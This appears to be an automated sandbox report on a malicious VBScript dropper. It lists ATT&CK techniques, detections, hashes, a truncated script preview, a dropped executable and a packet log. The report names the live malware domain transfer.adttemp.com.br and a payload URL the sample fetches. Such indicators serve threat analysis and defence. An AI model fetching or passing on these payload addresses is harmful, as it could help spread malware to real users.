          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Modify Registry
          Proc Filesystem1
          Remote System Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
          Virtualization/Sandbox Evasion
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
          Process Injection
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\temp_executable.exe100%AviraTR/Dropper.Gen
          C:\Users\user\AppData\Local\Temp\temp_executable.exe100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLink
          transfer.adttemp.com.br5%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://crl.entrust.net/server1.crl00%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://secure.comodo.com/CPS00%URL Reputationsafe
          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
          https://transfer.adttemp.com.br4%VirustotalBrowse
          http://transfer.adttemp.com.br5%VirustotalBrowse
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          transfer.adttemp.com.br
          104.196.109.209
          truefalseunknown
          NameMaliciousAntivirus DetectionReputation
          https://transfer.adttemp.com.br/hUkry/sirdeeeeee.txtfalse
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://transfer.adttemp.com.brtemp_executable.exe, 00000002.00000002.371150308.0000000002794000.00000004.00000800.00020000.00000000.sdmptrueunknown
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            http://crl.entrust.net/server1.crl0temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://ocsp.entrust.net03temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://transfer.adttemp.com.brtemp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmptrueunknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            http://www.diginotar.nl/cps/pkioverheid0temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://transfer.adttemp.com.br/hUkry/sirdeeeeee.txtX~temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmptrue
              unknown
              http://ocsp.entrust.net0Dtemp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametemp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://secure.comodo.com/CPS0temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://transfer.adttemp.com.brXtemp_executable.exe, 00000002.00000002.371150308.0000000002794000.00000004.00000800.00020000.00000000.sdmptrue
                unknown
                http://crl.entrust.net/2048ca.crl0temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                104.196.109.209
                transfer.adttemp.com.brUnited States
                15169GOOGLEUSfalse
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1530695
                Start date and time:2024-10-10 12:21:56 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 57s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:4
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:KjFT0qPTo4.vbs
                renamed because original name is a hash value
                Original Sample Name:437d16ac6fb62c138841e2ddb216dca0.vbs
                Detection:MAL
                Classification:mal100.troj.expl.evad.winVBS@5/1@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 21
                • Number of non-executed functions: 46
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                06:22:51API Interceptor42x Sleep call for process: wscript.exe modified
                06:22:53API Interceptor16x Sleep call for process: temp_executable.exe modified
                06:23:34API Interceptor3x Sleep call for process: RegAsm.exe modified
                No context
                No context
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                7dcce5b76c8b17472d024758970a406bQuotation_398893.xlam.xlsxGet hashmaliciousUnknownBrowse
                • 104.196.109.209
                Documentosrs.ppamGet hashmaliciousRevengeRATBrowse
                • 104.196.109.209
                PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                • 104.196.109.209
                COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                • 104.196.109.209
                Ordin de plat#U0103.docx.docGet hashmaliciousUnknownBrowse
                • 104.196.109.209
                COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                • 104.196.109.209
                PAYMENT APPLICATION.xlsGet hashmaliciousUnknownBrowse
                • 104.196.109.209
                yYk4nXhHaA.docGet hashmaliciousUnknownBrowse
                • 104.196.109.209
                Maersk BL, IN & PL.xlsGet hashmaliciousRemcosBrowse
                • 104.196.109.209
                PO20241008.xlsGet hashmaliciousUnknownBrowse
                • 104.196.109.209
                No context
                Process:C:\Windows\System32\wscript.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):72704
                Entropy (8bit):5.975176572454892
                Encrypted:false
                SSDEEP:1536:8lE1kIo9cMtk/KI1t4uvPRMydDBg5sV+opzh:8lE1po9cMtsKI1t4uvPRMydDaNqN
                MD5:12E3B467C52A663A7B6F61AF61B63A11
                SHA1:6336F4CA9EC8105A0A3E32EDE0F2AAAE4DCAA7D7
                SHA-256:4B9B842F44FA8925E7CA3608DB8ABA660C02E3E1162DAAF458DD4D8021C04B50
                SHA-512:06FF931A16B55D792DF380B0174077E8D7DD324D062A34D4E13CE57F2F92C50CCBECC62CAE87598D2D11689C0223E4496241B476826EF7EAF5714EBE44AD12DB
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................................,... ...@....@.. ....................................`..................................+..K....`...............................+............................................... ............... ..H............text...4.... ...................... ..`.sdata.......@......................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:ASCII text, with very long lines (65451), with CRLF line terminators
                Entropy (8bit):4.433021692985713
                TrID:
                • Visual Basic Script (13500/0) 100.00%
                File name:KjFT0qPTo4.vbs
                File size:139'132 bytes
                MD5:437d16ac6fb62c138841e2ddb216dca0
                SHA1:0c74d149fbd1f4f1a20ba1f962564d02a88d184f
                SHA256:2b18564d817f6070f7cdb7f29dc8ba06a96772c7ce0ea72e74c944b089bf7df4
                SHA512:4dc2a180b770cf82c84d93cf649b530af33681d4f7d9c727aca6c44c1547a0dc078c6439a7980f1a726a874f1618aacb6d85b80d00e87c4caff6fd4e87cedccb
                SSDEEP:1536:6gda9TX8Jsk6YRN9qJgcs61wwmpxR8IFVU7H7HL830IkmdhJ6N40QO8BRC1bqbuy:gzYVx161wwXHuuIq1rsuG/fN
                TLSH:B5D37363DF069E1441970E7C8B065727BC6C85B8B3F9EED8E6E6480148F9726606B7CC
                File Content Preview:' Main Script Logic for Processing Base64 Data....Option Explicit....Dim base64Data..base64Data = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@
                Icon Hash:68d69b8f86ab9a86
                TimestampSource PortDest PortSource IPDest IP
                Oct 10, 2024 12:22:54.829889059 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:54.829976082 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:54.830053091 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:54.838200092 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:54.838277102 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.461716890 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.461935997 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.468152046 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.468206882 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.468703985 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.593528032 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.635441065 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.707839012 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.708163023 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.708173037 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.708211899 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.708337069 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.708403111 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.708483934 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.726053953 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.726068974 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.726100922 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.726125002 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.726186037 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.796356916 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.796555996 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.796576977 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.796638966 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.796638966 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.796705961 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.797261000 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.797312021 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.797466993 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.797532082 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.797605991 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.797687054 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.798615932 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.798665047 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.798680067 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.798701048 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.798758984 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.814595938 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.814646006 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.814769983 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.814836025 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.814913034 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.884644032 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.884763956 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.884792089 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.884819984 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.885020018 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.885303020 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.885380983 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.886868000 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.886924982 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.887279987 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.887351990 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.887583971 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.887644053 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.887764931 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.887835979 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.888137102 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.888194084 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.888775110 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.888845921 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.888906002 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.888966084 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.889523983 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.889588118 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.889653921 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.889714003 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.889801025 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.889863014 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.891766071 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.891935110 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.910001993 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.910145998 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.910221100 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.910221100 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.910284042 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.973754883 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.973854065 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.973915100 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.973953962 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.974024057 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.974040031 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.974086046 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.974143982 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.974157095 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.974275112 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.974330902 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.974344015 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.974396944 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.974455118 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.974467993 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.974859953 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.974919081 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.974932909 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.975003004 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.975059032 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.975074053 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.975466967 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.975532055 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.975544930 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.975621939 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.975676060 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.975689888 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.976140022 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.976198912 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.976212025 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.976289034 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.976356030 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.976368904 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.976936102 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.977000952 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.977014065 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.977269888 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.977327108 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.977339983 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.977411985 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.977475882 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.977488041 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.977552891 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.977612019 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.977626085 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.978255987 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.978317976 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.978331089 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.978401899 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.978458881 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.978471994 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.978986025 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.979042053 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.979052067 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.979067087 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.979103088 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.979682922 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.979737997 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.979746103 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.979758024 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.979796886 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.979810953 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.979860067 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.980600119 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.980654955 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.991270065 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.991350889 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.991626024 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.991683006 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.991904020 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.991969109 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.992408991 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.992471933 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:55.992527962 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:55.992594957 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.061491966 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.061638117 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.061692953 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.061755896 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.061815023 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.061825037 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.061847925 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.061901093 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.062093019 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.062199116 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.062217951 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.062526941 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.062597990 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.062613964 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.062649012 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.062700987 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.062716007 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.062963963 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.063034058 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.063045979 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.063291073 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.063345909 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.063359022 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.063512087 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.063571930 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.063587904 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.063620090 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.063673019 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.063694000 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.064377069 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.064439058 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.064459085 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.064965010 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.065027952 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.065042019 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.065886021 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.065951109 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.065964937 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.066715956 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.066783905 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.066797972 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.067589998 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.067655087 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.067668915 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.067852974 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.067912102 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.067925930 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.068463087 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.068531036 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.068546057 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.069154024 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.069214106 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.069228888 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.079720020 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.079930067 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.079992056 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.080454111 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.080663919 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.080725908 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.150254965 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.150480986 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.150542974 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.150592089 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.150614023 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.150650024 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.150650978 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.150684118 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.150712013 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.150729895 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.150743008 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.150878906 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.150938988 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.151086092 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.151087046 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.151155949 CEST44349163104.196.109.209192.168.2.22
